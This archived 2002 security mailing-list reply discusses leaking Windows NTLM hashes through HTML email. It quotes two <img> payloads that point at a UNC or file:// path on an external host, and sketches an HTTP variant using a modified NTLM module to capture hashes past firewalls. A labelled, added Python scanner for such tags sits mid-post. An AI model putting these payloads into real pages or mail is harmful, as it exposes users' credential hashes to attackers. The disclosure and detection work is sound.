Re: Hijacking the hashes : multiple windows mail clients vulnerability

From: olle (olle@nxs.se)
Date: Thu Jul 04 2002 - 08:45:13 EDT


On Wed, Jul 03, 2002 at 04:43:46PM -0000, overclocking_a_la_abuela@hotmail.com wrote:
>
<snip>
> So, what about if there was another method to force a user on a windows
> box to send you his hashes, without his knowledge, without using any
> interactive method, non javascript, non activeX, non some lame social
> engineering technique... only HTML ?
>
<snip>

> 1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img
> src="\\\\external_IP\\resource">.

As you say in your post, any good firewall/border router would stop this.

You could try a normal http:// url to your apache server with a hacked up
NTLM-authentication module that records the challenge/response fields in
the SSP exchange... This would most likely bypass any firewall/proxy...

Never actually done this, but it might be fun to hack up some code similar
to slingerbult[1] that just solicits an SSP challenge/response and returns
a 1-pixel transparent gif or something... ;)

It would be fun if someone tried this out, I don't think I will have the
urge to do it any time soon, but it's been on my mind for quite some time.

/olle
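A defensive counterpart to the two `<img>` forms quoted above, added here as an example and not taken from the post or its author: it scans HTML for auto-fetched resources whose source is a bare UNC path or a `file://` URL with a remote host, which is what a mail or web gateway would flag before a Windows client ever opens the SMB connection. The sample page and the addresses in it are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the first two <img> tags are the two forms quoted in the
# thread (file://\\host\share and \\host\share); the address is a placeholder.
SAMPLE_HTML = """<html><body>
<img src="file://\\\\198.51.100.7\\share\\a.gif">
<img src="\\\\198.51.100.7\\share\\b.gif">
<img src="file:///C:/Windows/local.gif">
<img src="https://cdn.example.test/logo.png">
<img src="/images/local.png">
</body></html>"""

# file: followed by two or more slashes of either kind, or a bare \\, then the host.
_UNC_RE = re.compile(r"^(?:file:[\\/]{2,}|\\\\)([^\\/?#]+)", re.IGNORECASE)

def unc_host(src):
    """Return the remote host an src would make an SMB client contact, else None."""
    m = _UNC_RE.match(src.strip())
    if not m:
        return None
    host = m.group(1)
    # file:///C:/... parses as host "C:"; a local drive is not a network fetch.
    if host.endswith(":") or host.lower() == "localhost":
        return None
    return host

class _SrcCollector(HTMLParser):
    # Tags a client fetches without user interaction, and the attribute holding the URL.
    AUTO_FETCH = {"img": "src", "script": "src", "iframe": "src",
                  "embed": "src", "link": "href"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = self.AUTO_FETCH.get(tag)
        if wanted:
            for name, value in attrs:
                if name == wanted and value is not None:
                    self.refs.append((tag, value))

def find_unc_fetches(html):
    """Return [(tag, src, host)] for every auto-fetched resource that points at a UNC host."""
    parser = _SrcCollector()
    parser.feed(html)
    parser.close()
    return [(tag, src, unc_host(src)) for tag, src in parser.refs if unc_host(src)]
```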

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT